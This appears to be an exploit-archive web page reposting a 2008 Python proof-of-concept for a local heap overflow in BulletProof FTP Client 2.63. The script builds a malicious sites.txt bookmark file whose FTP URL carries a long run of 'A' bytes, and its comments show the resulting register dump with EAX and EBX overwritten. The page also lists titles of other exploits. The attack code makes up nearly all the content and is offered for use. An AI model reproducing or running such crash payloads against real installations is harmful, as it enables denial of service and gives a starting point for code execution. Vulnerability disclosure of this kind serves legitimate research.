首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
BulletProof FTP Client 2.63 Local Heap Overflow PoC
来源:www.vfcocus.net 作者:His0k4 发布时间:2008-12-25  
#!/usr/bin/python
#
#                  
#                  ------  |      ______ _____   (--, __*__  ______
#                  |____|  |      |    | |       | ! )  |    |     |
#                [ |    |` |      | <> | |-----> |__/   |    |     | ]
#                  | .. |  |____! |____| |____   |\     |    |-----|
#                                      |        _| \  -----  | ::: |
#                                      |         |  \
#                                |_____|         |   \
#                                                |
#                                                |
#                                               ,|.
#                                              / | \
#                                             |  |  |
#                                             |  _  |
#                                           `._\/.\/_,'
#                                             _( 8 )_
#                                            / '_ _' \
#                                           |  /{_}\  |
#                                           ` |  "  | `
#                                             |     |
#
#
# [+] Application : BulletProof FTP (Client)  V2.63
#
# [+] Vendor URL : http://www.bpftp.com/
#
# [+] Bug : BulletProof FTP Client Local Heap Overflow (PoC)
#
# [+] Author : His0k4
#
# [+] Greetings : All friends & Muslims Hackers (dz)
#---------------------------------------------------------------------------------
# EAX 41414141
# ECX 016EC370
# EDX 00000000
# EBX 41414141
# ESP 0012F548
# EBP 0012F5C4 ASCII "AAAAAAAAAAAA"
# ESI 0170E70A ASCII "]AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
# EDI 0170E90A ASCII 03,"ftp"
# EIP 00596423 bpftpcli.00596423
#---------------------------------------------------------------------------------


header1 = "; This file was exported from BulletProof FTP Client vBulletProof FTP Client v2.63 (Build 56)\n"
header2 = "; Sitename=test site\n"
buff = "FTP://user:pass@" + "\x41" * 93


vuln = header1 + header2 + buff

try:
    out_file = open("sites.txt",'w')
    out_file.write(vuln)
    out_file.close()
    raw_input("\nBookmark file created!\n\nNow import the file and run it\n\nPress to exit...")
except:
    print "Error!"

# EoF


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Oracle Pwnage Part 6 from DBA
·Joomla Component 5starhotels (
·PHP-Fusion <= 7.0.2 Remote Bli
·Acoustica Mixcraft <= 4.2 Univ
·Exploits FreeSSHd Multiple Rem
·SAWStudio 3.9i (prf File) Loca
·FreeSSHD 1.2.1 (Post Auth) Rem
·FreeBSD 7/6x protosw kernel ex
·Google Chrome Browser (ChromeH
·PSI remote integer overflow Do
·Getleft 1.2 Remote Buffer Over
·Exploits joomla com_lowcosthot
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved